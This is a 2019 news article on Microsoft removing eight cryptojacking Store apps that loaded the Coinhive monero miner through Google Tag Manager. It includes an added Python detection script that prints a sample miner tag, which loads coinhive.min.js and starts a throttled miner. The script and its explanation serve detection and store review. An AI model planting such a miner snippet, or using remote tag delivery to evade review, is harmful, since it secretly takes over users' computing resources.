Microsoft Bag Filled with Pick Axes

Microsoft Finds and Boots Eight Cryptojacking Apps on Microsoft Store

February 19, 2019. Filed under Altcoins, Crime, Mining, News.

Microsoft has removed eight malicious apps from the Microsoft Store that had been secretly mining monero (XMR) on unsuspecting users' computers. Researchers from Symantec discovered the apps and notified Microsoft, which took them down.

Apps Worked in a Similar Fashion

According to Symantec's report, an unknown number of users could have downloaded the malicious apps via the official Microsoft Store. The report explains that all eight apps were designed to work in a similar fashion.

The apps were built to load a Google-based tag-management library at runtime and to use it to download and execute the malicious payload; the mining code itself did not have to ship inside the app package. The offending apps were named Fast-search Lite, Battery Optimizer (Tutorials), VPN Browser+, Downloader for YouTube Videos, Clean Master+ (Tutorials), FastTube, Findoo Browser 2019 and Findoo Mobile and Desktop Search.

Symantec’s Yuanjing Guo and Tommy Dong explained:

“In total, we discovered eight apps from these developers that shared the same risky behavior […] after further investigation, we believe that all these apps were likely developed by the same person or group.”

Activate Google Tag Manager (GTM)

The research team told ZDNet that they discovered the offending apps on January 17, 2019, and informed Microsoft, which has since removed them from the Microsoft Store. The researchers believe the apps were created between April and December 2018, with most of them probably published towards the end of the year.

The researchers explained that once a victim downloaded and launched any of the malicious apps, the app fetched a coin-mining JavaScript library. The attackers did this through Google Tag Manager (GTM), Google's tagging system for managing the HTML and JavaScript tags that websites use for analytics and tracking. Because GTM fetches its tag configuration from Google's servers each time the app runs, the tag container, rather than the app package, delivered the mining script.

JavaScript Darling of Hackers

Once activated, the mining script, made by Coinhive, consumes a considerable share of the user's CPU cycles to mine the privacy-centric cryptocurrency monero.

According to the researchers, the apps do not mention coin mining in their store descriptions or privacy policies. The Coinhive JavaScript miner has been a favorite of hackers, who stealthily embed it in apps or websites to mine monero using the processing power of victims' computers, tablets, and phones.
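The loading chain described in the two passages above (a GTM container fetched at runtime, then the Coinhive miner it delivers) is what a store reviewer or incident responder would want to detect. The following is an added example, not Symantec's tooling or code from the apps in the report: a small Python triage script that scans packaged app sources and captured runtime responses for the GTM loader, the Coinhive library URL and a miner start call, and classifies the result. The HTML samples, the container ID GTM-EXAMPLE1 and the site key EXAMPLEKEY0000 are constructed for this example.

```python
import re
from dataclasses import dataclass
from typing import Dict, List, Tuple

# The GTM loader and container ID are benign on their own. They are flagged only
# because the container is served by Google and can be edited by the developer
# after store review, so the packaged app never has to contain the payload.
GTM_LOADER = re.compile(r"googletagmanager\.com/gtm\.js\?id=")
GTM_CONTAINER_ID = re.compile(r"['\"](GTM-[A-Z0-9]{4,})['\"]")
# Coinhive's library URL and constructor names (the service closed in 2019).
COINHIVE_LIB = re.compile(r"https?://(?:coinhive|coin-hive)\.com/lib/coinhive\.min\.js", re.I)
MINER_START = re.compile(r"CoinHive\.(Anonymous|User)\s*\(\s*['\"]([^'\"]+)['\"]")
THROTTLE = re.compile(r"throttle\s*:\s*(\d*\.?\d+)")


@dataclass(frozen=True)
class Finding:
    kind: str    # "gtm-loader" | "coinhive-lib" | "miner-start"
    detail: str
    origin: str  # which input the indicator was found in


def scan(origin: str, text: str) -> List[Finding]:
    """Return every indicator present in one source file or captured response."""
    found = []
    if GTM_LOADER.search(text):
        ids = sorted(set(GTM_CONTAINER_ID.findall(text)))
        found.append(Finding("gtm-loader", ",".join(ids) or "no container id", origin))
    for m in COINHIVE_LIB.finditer(text):
        found.append(Finding("coinhive-lib", m.group(0), origin))
    for m in MINER_START.finditer(text):
        detail = "CoinHive.%s site key %s" % (m.group(1), m.group(2))
        t = THROTTLE.search(text, m.end())  # throttle hides the CPU spike from the user
        if t:
            detail += ", throttle %s" % t.group(1)
        found.append(Finding("miner-start", detail, origin))
    return found


def assess(sources: Dict[str, str]) -> Tuple[str, List[Finding]]:
    """Classify a set of sources: packaged files plus any captured runtime responses."""
    findings = [f for origin, text in sources.items() for f in scan(origin, text)]
    kinds = {f.kind for f in findings}
    if kinds & {"coinhive-lib", "miner-start"}:
        verdict = "cryptojacking"
    elif "gtm-loader" in kinds:
        # Nothing malicious on disk, but the remote container decides what runs next.
        verdict = "review-gtm-container"
    else:
        verdict = "clean"
    return verdict, findings


# Constructed sample: what a web app submitted to the store might ship. Only the
# standard GTM snippet is present; "GTM-EXAMPLE1" is a made-up container ID.
PACKAGED_INDEX_HTML = """<!doctype html><html><head><title>Fast Search</title>
<script>
(function(w,d,s,l,i){w[l]=w[l]||[];var f=d.getElementsByTagName(s)[0],j=d.createElement(s);
j.async=true;j.src='https://www.googletagmanager.com/gtm.js?id='+i;f.parentNode.insertBefore(j,f);
})(window,document,'script','dataLayer','GTM-EXAMPLE1');
</script></head><body><input placeholder="search"></body></html>"""

# Constructed sample: a custom HTML tag as the container might deliver it at
# runtime, captured through a proxy. "EXAMPLEKEY0000" is a made-up site key.
RUNTIME_GTM_TAG = """<script src="https://coinhive.com/lib/coinhive.min.js"></script>
<script>
var miner = new CoinHive.Anonymous('EXAMPLEKEY0000', {throttle: 0.2});
miner.start();
</script>"""


if __name__ == "__main__":
    for label, sources in (
        ("packaged app only", {"index.html": PACKAGED_INDEX_HTML}),
        ("packaged app + captured container", {"index.html": PACKAGED_INDEX_HTML,
                                               "gtm.js?id=GTM-EXAMPLE1": RUNTIME_GTM_TAG}),
    ):
        verdict, findings = assess(sources)
        print(label, "->", verdict)
        for f in findings:
            print("  %-12s %-24s %s" % (f.kind, f.origin, f.detail))
```

Run against the packaged app alone, the script can only report review-gtm-container: nothing in the package is malicious, because the container that injects the miner is served from Google at runtime and can be changed after store review. The miner only shows up once you also feed in what gtm.js actually delivered, captured through a proxy or from the running app, which is why a static review of a store submission is not sufficient for apps that load GTM or any other remote tag manager.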

The research team believes the apps, which share the same domain servers, were most likely developed by the same people publishing under different names such as DigiDream, 1clean, and Findoo. Symantec said that, apart from Microsoft, it also contacted Google, which has removed the mining JavaScript from Google Tag Manager.

Cryptojacking malware targeting monero was a leading threat in the crypto space in 2018; its victims have included the Make-A-Wish Foundation's website and The Los Angeles Times, among others. Kaspersky Lab recently reported that one crypto-mining operation made over $7 million in six months by infecting computers with mining malware.
